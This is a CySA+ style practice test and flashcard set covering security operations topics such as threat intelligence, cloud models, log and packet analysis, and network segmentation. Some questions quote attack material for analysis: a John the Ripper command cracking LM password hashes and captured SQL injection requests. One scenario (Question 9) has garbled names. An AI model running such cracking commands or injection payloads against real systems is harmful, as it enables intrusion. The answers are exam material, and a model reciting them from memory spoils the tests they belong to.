Practice Tests - Chapter 1: Domain 1.0: Security Operations

Question 1

4- What term is used to describe the groups of related organizations that pool resources to share cybersecurity threat information and analyses?

• SOC
• ISAC
• CERT
• CIRT

Answer 1

ISAC

The Department of Homeland Security collaborates with industry through information sharing and analysis centers (ISACs). These ISACs cover industries such as healthcare, financial, aviation, government, and critical infrastructure.

Question 2

ISAC

Answer 2

Information Sharing and Analysis Centers

groups of related organizations that pool resources to share cybersecurity threat information and analyses

Question 3

5- Singh incorporated the Cisco Talos tool into his organization’s threat intelligence program. He uses it to automatically look up information about the past activity of IP addresses sending email to his mail servers. What term best describes this intelligence source?

• Open source
• Behavioral
• Reputational
• Indicator of compromise

Answer 3

Reputational

This source provides information about IP addresses based on past behavior. This makes it a reputational source. A behavioral source would look at information about current behavior. This is a product offered by Cisco and is proprietary, not open source. It does not provide indicators that would help you determine whether your system had been compromised.

Question 4

6- Jamal is assessing the risk to his organization from their planned use of AWS Lambda, a serverless computing service that allows developers to write code and execute functions directly on the cloud platform. What cloud tier best describes this service?

• SaaS
• PaaS
• IaaS
• FaaS

Answer 4

FaaS

This is an example of function‐as‐a‐service (FaaS) computing. A service like Lambda could also be described as platform‐as‐a‐service (PaaS), because FaaS is a subset of PaaS. However, the term FaaS is the one that best describes this service.

Question 5

8- Fred believes that the malware he is tracking uses a fast flux DNS network, which associates many IP addresses with a single fully qualified domain name as well as using multiple download hosts. How many distinct hosts should he review based on the NetFlow shown here?

Date flow start Duration Proto Src IP Addr:Port Dst IP Addr:Port Packets Bytes Flows
2020-07-11 14:39:30.606 0.448 TCP 192.168.2.1:1451->10.2.3.1:443 10 1510 1
2020-07-11 14:39:30.826 0.448 TCP 10.2.3.1:443->192.168.2.1:1451 7 360 1
2020-07-11 14:45:32.495 18.492 TCP 10.6.2.4:443->192.168.2.1:1496 5 1107 1
2020-07-11 14:45:32.255 18.888 TCP 192.168.2.1:1496->10.6.2.4:443 11 1840 1
2020-07-11 14:46:54.983 0.000 TCP 192.168.2.1:1496->10.6.2.4:443 1 49 1
2020-07-11 16:45:34.764 0.362 TCP 10.6.2.4:443->192.168.2.1:4292 4 1392 1
2020-07-11 16:45:37.516 0.676 TCP 192.168.2.1:4292->10.6.2.4:443 4 462 1
2020-07-11 16:46:38.028 0.000 TCP 192.168.2.1:4292->10.6.2.4:443 2 89 1
2020-07-11 14:45:23.811 0.454 TCP 192.168.2.1:1515->10.6.2.5:443 4 263 1
2020-07-11 14:45:28.879 1.638 TCP 192.168.2.1:1505->10.6.2.5:443 18 2932 1
2020-07-11 14:45:29.087 2.288 TCP 10.6.2.5:443->192.168.2.1:1505 37 48125 1
2020-07-11 14:45:54.027 0.224 TCP 10.6.2.5:443->192.168.2.1:1515 2 1256 1
2020-07-11 14:45:58.551 4.328 TCP 192.168.2.1:1525->10.6.2.5:443 10 648 1
2020-07-11 14:45:58.759 0.920 TCP 10.6.2.5:443->192.168.2.1:1525 12 15792 1
2020-07-11 14:46:32.227 14.796 TCP 192.168.2.1:1525->10.8.2.5:443 31 1700 1
2020-07-11 14:46:52.983 0.000 TCP 192.168.2.1:1505->10.8.2.5:443 1 40 1

• 1
• 3
• 4
• 5

Answer 5

4

This flow sample shows four distinct hosts being accessed from 192.168.2.1. They are 10.2.3.1, 10.6.2.4, 10.6.2.5, and 10.8.2.5.

Question 6

9- Which one of the following functions is not a common recipient of threat intelligence information?

• Legal counsel
• Risk management
• Security engineering
• Detection and monitoring

Answer 6

Legal counsel

Threat intelligence information is not commonly shared with legal counsel on a routine basis. CompTIA’s CySA+ objectives list the following common recipients: incident response, vulnerability management, risk management, security engineering, and detection and monitoring.

Question 7

10- Alfonzo is an IT professional at a Portuguese university who is creating a cloud environment for use only by other Portuguese universities. What type of cloud deployment model is he using?

• Public cloud
• Private cloud
• Hybrid cloud
• Community cloud

Answer 7

Community cloud

Community clouds are cloud computing environments available only to members of a collaborative community, such as a set of universities. Public clouds are available to any customers who want to use them. Private clouds are for the use of the organization building the cloud only. Hybrid clouds mix elements of public and private clouds in an enterprise computing strategy.

Question 8

Remanence

Answer 8

The magnetic flux density remaining in a material after an external magnetic field is removed

Question 9

12- The company that Maria works for is making significant investments in infrastructure‐as‐a‐service hosting to replace its traditional datacenter. Members of her organization’s management have Maria’s concerns about data remanence when Lauren’s team moves from one virtual host to another in their cloud service provider’s environment. What should she instruct her team to do to avoid this concern?

• Zero‐wipe drives before moving systems.
• Use full‐disk encryption.
• Use data masking.
• Span multiple virtual disks to fragment data.

Answer 9

Use full‐disk encryption.

Maria’s team should use full‐disk encryption or volume encryption and should secure the encryption keys properly. This will ensure that any data that remains cannot be exposed to future users of the virtual infrastructure. Although many cloud providers have implemented technology to ensure that this won’t happen, Maria can avoid any potential issues by ensuring that she has taken proactive action to prevent data exposure. Using a zero‐wipe is often impossible because virtual environments may move without her team’s intervention, data masking will not prevent unmasked data or temporary data stored on the virtual disks from being exposed, and spanning multiple virtual disks will still leave data accessible, albeit possibly in fragmented form.

Question 10

Geoff is reviewing logs and sees a large number of attempts to authenticate to his VPN server using many different username and password combinations. The same usernames are attempted several hundred times before moving on to the next one. What type of attack is most likely taking place?

• Credential stuffing
• Password spraying
• Brute‐force
• Rainbow table

Answer 10

Password spraying

In a password spraying attack, the attacker tries a set of common passwords using many different accounts. The activity Geoff sees is consistent with this type of attack. Credential stuffing attacks seek to use username/password lists stolen from another site to log on to a different site. This would result in only one login attempt per username. Brute‐force attacks would result in thousands or millions of attempts per username. Rainbow table attacks take place offline and would not be reflected in the logs.

Question 11

Credential stuffing

Answer 11

Credential stuffing attacks occur when an attacker takes a list of usernames and passwords that were stolen in the compromise of one website and uses them to attempt to gain access to a different, potentially unrelated, website. Credential stuffing attacks are successful when users reuse the same password across many different sites.

Question 12

Password spraying

Answer 12

Password spraying attacks occur when an attacker uses a list of common passwords and attempts to log into many different user accounts with those common passwords. The attacker only needs to find one valid username/password combination to gain access to the system. This attack is successful when users do not choose sufficiently unique passwords

Question 13

14- Kaiden is configuring a SIEM service in his IaaS cloud environment that will receive all of the log entries generated by other devices in that environment. Which one of the following risks is greatest with this approach in the event of a DoS attack or other outage?

• Inability to access logs
• Insufficient logging
• Insufficient monitoring
• Insecure API

Answer 13

Inability to access logs

The greatest risk in the event of a DoS attack is that the logs are stored in the same cloud environment that is under attack. Cybersecurity professionals may not be able to access those logs to investigate the incident.

Question 14

15- Azra believes that one of her users may be taking malicious action on the systems she has access to. When she walks past the user’s desktop, she sees the following command on the screen:

user12@workstation:/home/user12# ./john -
wordfile:/home/user12/mylist.txt -format:lm hash.txt
What is the user attempting to do?

• They are attempting to hash a file.
• They are attempting to crack hashed passwords.
• They are attempting to crack encrypted passwords.
• They are attempting a pass‐the‐hash attack.

Answer 14

They are attempting to crack hashed passwords.

Azra’s suspicious user appears to be attempting to crack LANMAN hashes using a custom word list. The key clues here are the john application, the LM hash type, and the location of the word list.

Question 15

16- Lucas believes that an attacker has successfully compromised his web server. Using the following output of ps, identify the process ID he should focus on:

root 507 0.0 0.1 258268 3288 ? Ssl 15:52 0:00 /usr/sbin/rsyslogd -n
message+ 508 0.0 0.2 44176 5160 ? Ss 15:52 0:00 /usr/bin/dbusdaemon –system –address=systemd: –nofork –nopidfile –systemd-activa
root 523 0.0 0.3 281092 6312 ? Ssl 15:52 0:00 /usr/lib/accountsservice/accounts-daemon
root 524 0.0 0.7 389760 15956 ? Ssl 15:52 0:00 /usr/sbin/NetworkManager –no-daemon
root 527 0.0 0.1 28432 2992 ? Ss 15:52 0:00 /lib/systemd/systemd-logind
apache 714 0.0 0.1 27416 2748 ? Ss 15:52 0:00 /www/temp/webmin
root 617 0.0 0.1 19312 2056 ? Ss 15:52 0:00 /usr/sbin/irqbalance –pid=/var/run/irqbalance.pid
root 644 0.0 0.1 245472 2444 ? Sl 15:52 0:01 /usr/sbin/VBoxService
root 653 0.0 0.0 12828 1848 tty1 Ss+ 15:52 0:00 /sbin/agetty –noclear tty1 linux
root 661 0.0 0.3 285428 8088 ? Ssl 15:52 0:00 /usr/lib/policykit-1/polkitd –no-debug
root 663 0.0 0.3 364752 7600 ? Ssl 15:52 0:00 /usr/sbin/gdm3
root 846 0.0 0.5 285816 10884 ? Ssl 15:53 0:00 /usr/lib/upower/upowerd
root 867 0.0 0.3 235180 7272 ? Sl 15:53 0:00 gdm-session-worker [pam/gdm-launch-environment]
Debian-+ 877 0.0 0.2 46892 4816 ? Ss 15:53 0:00 /lib/systemd/systemd –user
Debian-+ 878 0.0 0.0 62672 1596 ? S 15:53 0:00 (sd-pam)

• 508
• 617
• 846
• 714

Answer 15

714

The service running from the www directory as the user apache should be an immediate indication of something strange, and the use of webmin from that directory should also be a strong indicator of something wrong. Lucas should focus on the web server for the point of entry to the system and should review any files that the Apache user has created or modified. If local vulnerabilities existed when this compromise occurred, the attacker may have already escalated to another account!

Question 16

17- Geoff is responsible for hardening systems on his network and discovers that a number of network appliances have exposed services, including telnet, FTP, and web servers. What is his best option to secure these systems?

• Enable host firewalls.
• Install patches for those services.
• Turn off the services for each appliance.
• Place a network firewall between the devices and the rest of the network.

Answer 16

Place a network firewall between the devices and the rest of the network.

Geoff’s only sure bet to prevent these services from being accessed is to put a network firewall in front of them. Many appliances enable services by default; since they are appliances, they may not have host firewalls available to enable. They also often don’t have patches available, and many appliances do not allow the services they provide to be disabled or modified.

Question 17

18- While conducting reconnaissance of his own organization, Ian discovers that multiple certificates are self‐signed. What issue should he report to his management?

• Self‐signed certificates do not provide secure encryption for site visitors.
• Self‐signed certificates can be revoked only by the original creator.
• Self‐signed certificates will cause warnings or error messages.
• None of the above.

Answer 17

Self‐signed certificates will cause warnings or error messages.

Using self‐signed certificates for services that will be used by the general public or organizational users outside of a small testing group can be an issue because they will result in an error or warning in most browsers. The TLS encryption used for HTTPS will remain just as strong regardless of whether the certificate is provided by a certificate authority or self‐signed, and a self‐signed certificate cannot be revoked at all.

Question 18

19- Brandon wants to perform a WHOIS query for a system he believes is located in Europe. Which NIC should he select to have the greatest likelihood of success for his query?

• AFRINIC
• APNIC
• RIPE
• LACNIC

Answer 18

RIPE

Brandon should select RIPE, the regional Internet registry for Europe, the Middle East, and parts of Central Asia. AFRINIC serves Africa, APNIC serves the Asia/Pacific region, and LACNIC serves Latin America and the Caribbean.

Question 19

AFRINIC

Answer 19

the regional Internet registry for Africa

Question 20

APNIC

Answer 20

the regional Internet registry for Asia/Pacific region

Question 21

RIPE

Answer 21

the regional Internet registry for Europe, the Middle East, and parts of Central Asia

Question 22

LACNIC

Answer 22

the regional Internet registry for Latin America and the Caribbean.

Question 23

20- While reviewing Apache logs, Janet sees the following entries as well as hundreds of others from the same source IP address. What should Janet report has occurred?

[ 21/Jul/2020:02:18:33 -0500] - - 10.0.1.1 “GET /scripts/sample.php” “-“ 302 336 0
[ 21/Jul/2020:02:18:35 -0500] - - 10.0.1.1 “GET /scripts/test.php” “-“ 302 336 0
[ 21/Jul/2020:02:18:37 -0500] - - 10.0.1.1 “GET /scripts/manage.php” “-“ 302 336 0
[ 21/Jul/2020:02:18:38 -0500] - - 10.0.1.1 “GET /scripts/download.php” “-“ 302 336 0
[ 21/Jul/2020:02:18:40 -0500] - - 10.0.1.1 “GET /scripts/update.php” “-“ 302 336 0
[ 21/Jul/2020:02:18:42 -0500] - - 10.0.1.1 “GET /scripts/new.php” “-“ 302 336 0

• A denial‐of‐service attack
• A vulnerability scan
• A port scan
• A directory traversal attack

Answer 23

A vulnerability scan

Testing for common sample and default files is a common tactic for vulnerability scanners. Janet can reasonably presume that her Apache web server was scanned using a vulnerability scanner.

Question 24

21- Scott is part of the white team that is overseeing his organization’s internal red and blue teams during an exercise that requires each team to only perform actions appropriate to the penetration test phase they are in. During the reconnaissance phase, he notes the following behavior as part of a Wireshark capture. What should he report?

A screenshot of a table has seventeen rows and seven columns. The column headers are as follows: Number; Time; Source; Destination; Protocol; Length; and Info. The row-wise data are as follows: Row 1: Number, 2180; Time, 2.493035366; Source, 1 0 dot 0 dot 2 dot 4; Destination, 1 0 dot 0 dot 2 dot 1 5; Protocol, T C P; Length, 66; and Info, 80 right arrow 55554, left bracket, F I N, comma, A C K, right bracket, S e q equals 507, A c k equals 420, W I n equals 6880, L e n equals 0, T S v a l equals 127193, T S e c r equals 317472. Row 2: Number, 2181; Time, 2.493271630; Source, 1 0 dot 0 dot 2 dot 1 5; Destination, 1 0 dot 0 dot 2 dot 4; Protocol, T C P; Length, 66; and Info, 55554 right arrow 80, left bracket, F I N, comma, A C K, right bracket, S e q equals 420, A c k equals 508, W I n equals 30336, L e n equals 0, T S v a l equals 317472, T S e c r equals 127193. Row 3: Number, 2182; Time, 2.493462055; Source, 1 0 dot 0 dot 2 dot 4; Destination, 1 0 dot 0 dot 2 dot 1 5; Protocol, T C P; Length, 66; and Info, 80 right arrow 55554, left bracket, A C K, right bracket, S e q equals 508, A c k equals 421, W i n equals 6880, L e n equals 0, T S v a l equals 127193, T S e c r equals 317472. Row 4: Number, 2183; Time, 2.496331161; Source, 1 0 dot 0 dot 2 dot 1 5; Destination, 1 0 dot 0 dot 2 dot 4; Protocol, T C P; Length, 66; and Info, 55552 right arrow 80, left bracket, F I N, comma, A C K, right bracket, S e q equals 413, A c k equals 503, W I n equals 30336, L e n equals 0, T S v a l equals 317472, T S e c r equals 127192. Row 5: Number, 2184; Time, 2.496386675; Source, 1 0 dot 0 dot 2 dot 1 5; Destination, 1 0 dot 0 dot 2 dot 4; Protocol, T C P; Length, 74; and Info, 55556 right arrow 80, left bracket, S Y N, right bracket, S e q equals 0, W i n equals 29200, L e n equals 0, M S S equals 1460, S A C K underscore P E R M equals 1, T S v a l equals 317473, T S e c r equals 0, W S equals 128. Row 6: Number, 2185; Time, 2.496500116; Source, 1 0 dot 0 dot 2 dot 4; Destination, 1 0 dot 0 dot 2 dot 1 5; Protocol, T C P; Length, 66; and Info, 80 right arrow 55552, left bracket, A C K, right bracket, S e q equals 503, A c k equals 414, W i n equals 6880, L e n equals 0, T S v a l equals 127193, T S e c r equals 317473. Row 7: Number, 2186; Time, 2.496520426; Source, 1 0 dot 0 dot 2 dot 4; Destination, 1 0 dot 0 dot 2 dot 1 5; Protocol, T C P; Length, 74; and Info, 80 right arrow 55556, left bracket, S Y N, comma, A C K, right bracket, S e q equals 0, A c k equals 1, W i n equals 5792, L e n equals 0, M S S equals 1460 S A C K underscore P E R M equals 1, T S v a l equals 127193, T S e c r equals 317. Row 8: Number, 2187; Time, 2.496527886; Source, 1 0 dot 0 dot 2 dot 1 5; Destination, 1 0 dot 0 dot 2 dot 4; Protocol, T C P; Length, 66; and Info, 55556 right arrow 80, left bracket, S Y N, right bracket, S e q equals 1, A c k equals 1, W i n equals 29312, L e n equals 0, T S v a l equals 317473, T S e c r equals 127193. Row 9: Number, 2188; Time, 2.497238098; Source, 1 0 dot 0 dot 2 dot 1 5; Destination, 1 0 dot 0 dot 2 dot 4; Protocol, H T T P; Length, 492; and Info, GET, forward slash, t w i k i, forward slash, percent, 20 UNION percent 20 ALL percent 20 SELECT percent 20 NULL percent 2 C NULL, percent 2 C NULL, percent 2 C NULL percent 2 C NULL PERCENT 23, H T T P, forward slash 1.1. Row 10: Number, 2189; Time, 2.497404022; Source, 1 0 dot 0 dot 2 dot 4; Destination, 1 0 dot 0 dot 2 dot 1 5; Protocol, T C P; Length, 66; and Info, 80 right arrow 55556, left bracket, A C K, right bracket, S e q equals 1, A c k equals 427, W I n equals 6880, L e n equals 0, T S v a l equals 127193, T S e c r equals 317473. Row 11: Number, 2190; Time, 2.497648036; Source, 1 0 dot 0 dot 2 dot 4; Destination, 1 0 dot 0 dot 2 dot 1 5; Protocol, H T T P; Length, 577; and Info, H T T P, forward slash 1.1, 404 Not Found, left parenthesis text, forward slash, h t m l, right parenthesis. Row 12: Number, 2191; Time, 2.497665375; Source, 1 0 dot 0 dot 2 dot 1 5; Destination, 1 0 dot 0 dot 2 dot 4; Protocol, T C P; Length, 66; and Info, 55556 right arrow 80, left bracket, A C K, right bracket, S e q equals 427, A c k equals 512, W I n equals 30336, L e n equals 0, T S v a l equals 317473, T S e c r equals 127194. Row 13: Number, 2192; Time, 2.497680491; Source, 1 0 dot 0 dot 2 dot 4; Destination, 1 0 dot 0 dot 2 dot 1 5; Protocol, T C P; Length, 66; and Info, 80 right arrow 55556, left bracket, F I N, comma, A C K, right bracket, S e q equals 512, A c k equals 427, W i n equals 6880, L e n equals 0, T S v a l equals 127194, T S e c r equals 317473. Row 14: Number, 2193; Time, 2.502043782; Source, 1 0 dot 0 dot 2 dot 1 5; Destination, 1 0 dot 0 dot 2 dot 4; Protocol, T C P; Length, 74; and Info, 55558 right arrow 80, left bracket, S Y N, right bracket, S e q equals 0, W i n equals 29200, L e n equals 0, M S S equals 1460, S A C K underscore P E R M equals 1, T S v a l equals 317474, T S e c r equals 0, W S equals 128. Row 15: Number, 2194; Time, 2.502267987; Source, 1 0 dot 0 dot 2 dot 4; Destination, 1 0 dot 0 dot 2 dot 1 5; Protocol, T C P; Length, 74; and Info, 80 right arrow 55558, left bracket, S Y N, comma, A C K, right bracket, S e q equals 0, A c k equals 1, W i n equals 5792, L e n equals 0, M S S equals 1460, S A C K underscore P E R M equals 1, T S v a l equals 127194, T S e c r equals 317. Row 16: Number, 2195; Time, 2.502294637; Source, 1 0 dot 0 dot 2 dot 1 5; Destination, 1 0 dot 0 dot 2 dot 4; Protocol, T C P; Length, 66; and Info, 55558 right arrow 80, left bracket, A C K, right bracket, S e q equals 1, A c k equals 1, W i n equals 29312, L e n equals 0, T S v a l equals 317474, T S e c r equals 127194. Row 17: Number, 2196; Time, 2.502356539; Source, 1 0 dot 0 dot 2 dot 1 5; Destination, 1 0 dot 0 dot 2 dot 4; Protocol, H T T P; Length, 499; and Info, GET, forward slash, t w i k i, forward slash, percent, 20 UNION percent 20 ALL percent 20 SELECT percent 20 NULL percent 2 C NULL, percent 2 C NULL, percent 2 C NULL percent 2 C NULL percent 2 C NULL PERCENT 23, H T T P, forward slash 1.1.

• The blue team has succeeded.
• The red team is violating the rules of engagement.
• The red team has succeeded.
• The blue team is violating the rules of engagement.

Answer 24

The red team is violating the rules of engagement.

This capture shows SQL injection attacks being attempted. We can determine this from the SQL keywords (e.g., UNION ALL) that appear in packets 2188 and 2196. Since this is the reconnaissance phase, the red team should not be actively attempting to exploit vulnerabilities and has violated the rules of engagement.

Question 25

22- Jennifer analyzes a Wireshark packet capture from a network that she is unfamiliar with. She discovers that a host with IP address 10.11.140.13 is running services on TCP ports 636 and 443. What services is that system most likely running?

• LDAPS and HTTPS
• FTPS and HTTPS
• RDP and HTTPS
• HTTP and Secure DNS

Answer 25

LDAPS and HTTPS

TCP port 636 is often used for secure LDAP, and secure HTTP typically uses TCP 443. Although other services could use these ports, Jennifer’s best bet is to presume that they will be providing the services they are typically associated with.

Question 26

28- Wang submits a suspected malware file to malwr.com and receives the following information about its behavior. What type of tool is malwr.com?

Signatures

A process attempted to delay the analysis task.
File has been identified by at least one AntiVirus on VirusTotal as malicious
The binary likely contains encrypted or compressed data.
Creates a windows hook that monitors keyboard input (keylogger)
Creates an Alternate Data Stream (ADS)
Installs itself for autorun at Windows startup

• A reverse‐engineering tool
• A static analysis sandbox
• A dynamic analysis sandbox
• A decompiler sandbox

Answer 26

A dynamic analysis sandbox

Wang’s screenshot shows behavioral analysis of the executed code. From this, you can determine that malwr is a dynamic analysis sandbox that runs the malware sample to determine what it does while also analyzing the file.

Question 27

30- Sarah has been asked to assess the technical impact of suspected reconnaissance performed against her organization. She is informed that a reliable source has discovered that a third party has been performing reconnaissance by querying WHOIS data. How should Sarah categorize the technical impact of this type of reconnaissance?

• High.
• Medium.
• Low.
• She cannot determine this from the information given.

Answer 27

Low.

Sarah knows that domain registration information is publicly available and that her organization controls the data that is published. Since this does not expose anything that she should not expect to be accessible, she should categorize this as a low impact.

Question 28

What does an ICMP echo request indicate?

Answer 28

Indicates that someone is doing a ping sweep

Question 29

32- Ryan’s passive reconnaissance efforts resulted in the following packet capture. Which of the following statements cannot be verified based on the packet capture shown for the host with IP address 10.0.2.4?

check picture in book

• The host does not have a DNS entry.
• It is running a service on port 139.
• It is running a service on port 445.
• It is a Windows system.

Answer 29

The host does not have a DNS entry.

While the system responded on common Windows ports, you cannot determine whether it is a Windows system. It did respond, and both ports 139 and 445 were accessible. When the host the Wireshark capture was conducted from queried DNS, it did not receive a response, indicating that the system does not have a DNS entry (or at least, it doesn’t have one that is available to the host that did the scan and ran the Wireshark capture).

Question 30

34- What purpose does a honeypot system serve when placed on a network as shown in the following diagram?

See picture in book

• It prevents attackers from targeting production servers.
• It provides information about the techniques attackers are using.
• It slows down attackers like sticky honey.
• It provides real‐time input to IDSs and IPSs.

Answer 30

It provides information about the techniques attackers are using.

A honeypot is used by security researchers and practitioners to gather information about techniques and tools used by attackers. A honeypot will not prevent attackers from targeting other systems, and unlike a tarpit, it is not designed to slow down attackers. Typically, honeypot data must be analyzed to provide useful information that can be used to build IDS and IPS rules.

Question 31

35- A tarpit, or a system that looks vulnerable but actually is intended to slow down attackers, is an example of what type of technique?

• A passive defense
• A sticky defense
• An active defense
• A reaction‐based defense

Answer 31

An active defense

Tarpits are a form of active defense that decoy or bait attackers. Passive defenses include cryptography, security architecture, and similar options. Sticky defenses and reaction‐based defenses were made up for this question.

Question 32

36- Susan needs to test thousands of submitted binaries. She needs to ensure that the applications do not contain malicious code. What technique is best suited to this need?

• Sandboxing
• Implementing a honeypot
• Decompiling and analyzing the application code
• Fagan testing

Answer 32

Sandboxing

Susan’s best option is to use an automated testing sandbox that analyzes the applications for malicious or questionable behavior. Although this may not catch every instance of malicious software, the only other viable option is decompiling the applications and analyzing the code, which would be incredibly time‐consuming. Since she doesn’t have the source code, Fagan inspection won’t work (and would take a long time too), and running a honeypot is used to understand hacker techniques, not to directly analyze application code.

Question 33

37- Manesh downloads a new security tool and checks its MD5. What does she know about the software she downloaded if she receives the following message?

root@demo:~# md5sum -c demo.md5
demo.txt: FAILED
md5sum: WARNING: 1 computed checksum did NOT match

• The file has been corrupted.
• Attackers have modified the file.
• The files do not match.
• The test failed and provided no answer.

Answer 33

The files do not match.

Manesh knows that the file she downloaded and computed a checksum for does not match the MD5 checksum that was calculated by the providers of the software. She does not know if the file has been corrupted or if attackers have modified the file, but she may want to contact the providers of the software to let them know about the issue—and she definitely shouldn’t execute or trust the file!

Question 34

41- Susan is reviewing files on a Windows workstation and believes that cmd.exe has been replaced with a malware package. Which of the following is the best way to validate her theory?

• Submit cmd.exe to VirusTotal.
• Compare the hash of cmd.exe to a known good version.
• Check the file using the National Software Reference Library.
• Run cmd.exe to make sure its behavior is normal.

Answer 34

Submit cmd.exe to VirusTotal.

Susan’s best option is to submit the file to a tool like VirusTotal that will scan it for virus‐like behaviors and known malware tools. Checking the hash either by using a manual check or by using the National Software Reference Library can tell her if the file matches a known good version but won’t tell her if it includes malware. Running a suspect file is the worst option on the list.

Question 35

42- Nishi is deploying a new application that will process sensitive health information about her organization’s clients. To protect this information, the organization is building a new network that does not share any hardware or logical access credentials with the organization’s existing network. What approach is Nishi adopting?

• Network interconnection
• Network segmentation
• Virtual LAN (VLAN) isolation
• Virtual private network (VPN)

Answer 35

Network segmentation

The strategy outlined by Nishi is one of network segmentation—placing separate functions on separate networks. She is explicitly not interconnecting the two networks. VPNs and VLANs are also technologies that could assist with the goal of protecting sensitive information, but they use shared hardware and would not necessarily achieve the level of isolation that Nishi requires.

Question 36

43- Bobbi is deploying a single system that will be used to manage a sensitive industrial control process. This system will operate in a stand‐alone fashion and not have any connection to other networks. What strategy is Bobbi deploying to protect this SCADA system?

• Network segmentation
• VLAN isolation
• Airgapping
• Logical isolation

Answer 36

Airgapping

Bobbi is adopting a physical, not logical, isolation strategy. In this approach, known as air‐gapping, the organization uses a stand‐alone system for the sensitive function that is not connected to any other system or network, greatly reducing the risk of compromise. VLAN isolation and network segmentation involve a degree of interconnection that is not present in this scenario.

Question 37

46- Which one of the following technologies is not typically used to implement network segmentation?

• Host firewall
• Network firewall
• VLAN tagging
• Routers and switches

Answer 37

Host firewall

Host firewalls operate at the individual system level and, therefore, cannot be used to implement network segmentation. Routers and switches may be used for this purpose by either physically separating networks or implementing VLAN tagging. Network firewalls may also be used to segment networks into different zones.

Question 38

47- Ian has been asked to deploy a secure wireless network in parallel with a public wireless network inside his organization’s buildings. What type of segmentation should he implement to do so without adding additional costs and complexity?

• SSID segmentation
• Logical segmentation
• Physical segmentation
• WPA segmentation

Answer 38

Logical segmentation

Ian knows that deploying multiple access points in the same space to deploy a physically segmented wireless network would significantly increase both the costs of deployment and the complexity of the network due to access points causing conflicts. His best choice is to logically segment his networks using one set of access points. SSID and WPA segmentation are both made‐up terms for this question.

Question 39

49- What major issue would Charles face if he relied on hashing malware packages to identify malware packages?

• Hashing can be spoofed.
• Collisions can result in false positives.
• Hashing cannot identify unknown malware.
• Hashing relies on unencrypted malware samples.

Answer 39

Hashing cannot identify unknown malware.

Relying on hashing means that Charles will be able to identify only the specific versions of malware packages that have already been identified. This is a consistent problem with signature‐based detections, and malware packages commonly implement polymorphic capabilities that mean that two instances of the same package will not have identical hashes due to changes meant to avoid signature‐based detection systems.

Question 40

52- Angela is a security practitioner at a midsize company that recently experienced a serious breach due to a successful phishing attack. The company has committed to changing its security practices across the organization and has assigned Angela to determine the best strategy to make major changes that will have a significant impact right away.

Angela has decided to roll out a multifactor authentication system. What are the two most common factors used in MFA systems?

• Location and knowledge
• Knowledge and possession
• Knowledge and biometric
• Knowledge and location

Answer 40

Knowledge and possession

The most common factors for multifactor systems today are knowledge factors (like a password) and possession factors, which can include a token, an authenticator application, or a smartcard.

Question 41

53- Angela is a security practitioner at a midsize company that recently experienced a serious breach due to a successful phishing attack. The company has committed to changing its security practices across the organization and has assigned Angela to determine the best strategy to make major changes that will have a significant impact right away.

Angela’s multifactor deployment includes the ability to use text (SMS) messages to send the second factor for authentication. What issues should she point to?

• VoIP hacks and SIM swapping.
• SMS messages are logged on the recipient’s phones.
• PIN hacks and SIM swapping.
• VoIP hacks and PIN hacks.

Answer 41

VoIP hacks and SIM swapping.

NIST has pointed out that SMS is a relatively insecure way to delivering codes as part of a multifactor authentication system. The two most common attacks against SMS message delivery are VoIP hacks, where SMS messages may be delivered to a VoIP system, which can be accessed by an attacker, and SIM swapping attacks, where a SIM card is cloned and SMS messages are also delivered to an attacker.

Question 42

54- What purpose does the OpenFlow protocol serve in software‐defined networks?

• It captures flow logs from devices.
• It allows software‐defined network controllers to push changes to devices to manage the network.
• It sends flow logs to flow controllers.
• It allows devices to push changes to SDN controllers to manage the network.

Answer 42

It allows software‐defined network controllers to push changes to devices to manage the network.

OpenFlow is used to allow software‐defined network (SDN) controllers to push changes to switches and routers, allowing flow control, network traffic partitioning, and testing of applications and configurations.

Question 43

OpenFlow

Answer 43

OpenFlow is an API (application programming interface) that allows for the central control of networks, which makes networks programmable through software-defined networking (SDN).

The OpenFlow protocol is used to allow software-defined network (SDN) controllers to push changes to switches and routers, allowing flow control, network traffic partitioning, and testing of applications and configurations

Question 44

55- Rick’s security research company wants to gather data about current attacks and sets up a number of intentionally vulnerable systems that allow his team to log and analyze exploits and attack tools. What type of environment has Rick set up?

• A tarpit
• A honeypot
• A honeynet
• A blackhole

Answer 44

A honeynet

Rick’s team has set up a honeynet—a group of systems set up to attract attackers while capturing the traffic they send and the tools and techniques they use. A honeypot is a single system set up in a similar way, whereas a tarpit is a system set up to slow down attackers. A blackhole is often used on a network as a destination for traffic that will be silently discarded.

Question 45

56- Kalea wants to prevent DoS attacks against her serverless application from driving up her costs when using a cloud service. What technique is not an appropriate solution for her need?

• Horizontal scaling
• API keys
• Setting a cap on API invocations for a given timeframe
• Using timeouts

Answer 45

Horizontal scaling

Scaling a serverless system is a useful way to handle additional traffic but will not prevent denial‐of‐service (DoS) attacks from driving additional cost. In fact, horizontal scaling will add additional costs as it scales. API keys can be used to prevent unauthorized use of the serverless application, and keys can be deprovisioned if they are abused. Capping API invocations and using timeouts can help limit the maximum number of uses and how much they are used, both of which can help prevent additional costs.

Question 46

57- What is the key difference between virtualization and containerization?

• Virtualization gives operating systems direct access to the hardware, whereas containerization does not allow applications to directly access the hardware.
• Virtualization lets you run multiple operating systems on a single physical system, whereas containerization lets you run multiple applications on the same system.
• Virtualization is necessary for containerization, but containerization is not necessary for virtualization.
• There is not a key difference; they are elements of the same technology.

Answer 46

Virtualization lets you run multiple operating systems on a single physical system, whereas containerization lets you run multiple applications on the same system.

Virtualization allows you to run multiple operating systems on the same underlying hardware, whereas containerization lets you deploy multiple applications on the same operating system on a single system. Containerization can allow direct hardware access, whereas virtualization typically does not. Virtualization is not necessary for containerization, although it is often used, but containerization can get performance improvements from bare‐metal installations. Finally, there is a key difference, as noted in option B.

Question 47

58- Brandon is designing the hosting environment for containerized applications. Application group A has personally identifiable information, application group B has health information with different legal requirements for handling, and application group C has business‐sensitive data handling requirements. What is the most secure design for his container orchestration environment given the information he has?

• Run a single, highly secured container host with encryption for data at rest.
• Run a container host for each application group and secure them based on the data they contain.
• Run a container host for groups A and B, and run a lower‐security container host for group C.
• Run a container host for groups A and C, and run a health information–specific container host for group B due to the health information it contains.

Answer 47

Run a container host for each application group and secure them based on the data they contain.

Workloads in a secure containerization environment should be distributed in a way that allows hosts to run containers of only a specific security level. Since Brandon has three different security levels in his environment, he should use separate hosts that can be configured to secure the data appropriately while also limiting the impact if a container is breached.

Question 48

61- Facebook Connect, CAS, Shibboleth, and AD FS are all examples of what type of technology?

• Kerberos implementations
• Single sign‐on implementations
• Federation technologies
• OAuth providers

Answer 48

Single sign‐on implementations

